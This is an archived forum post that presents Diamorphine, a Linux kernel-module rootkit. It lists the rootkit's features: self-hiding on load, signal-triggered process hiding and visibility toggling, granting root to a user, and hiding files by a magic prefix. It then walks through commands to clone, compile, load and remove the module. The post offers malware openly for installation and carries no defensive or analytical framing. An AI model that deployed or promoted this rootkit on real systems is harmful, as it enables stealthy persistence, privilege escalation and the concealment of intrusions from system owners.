PDA

View Full Version : Diamorphine is a LKM rootkit for Linux Kernels 2.6.X/3.X



raiden
2015-12-26, 19:11
Diamorphine is a LKM rootkit for Linux Kernels 2.6.X/3.X
Features

When loaded, the module starts invisible;

Hide/unhide any process by sending a signal 31;

Sending a signal 63(to any pid) makes the module become (in)visible;

Sending a signal 64(to any pid) makes the given user become root;

Files or directories starting with the MAGIC_PREFIX become invisble;

Source: https://github.com/m0nad/Diamorphine

Instalation

Verify if the kernel is 2.6.X/3.X

uname -r

Clone the repository

git clone https://github.com/m0nad/Diamorphine

Enter the folder

cd Diamorphine

Compile

make

Load the module(as root)

insmod diamorphine.ko

Desinstalation

The module starts invisible, to remove you need to make its visible

kill -63 0

Then remove the module(as root)

rmmod diamorphine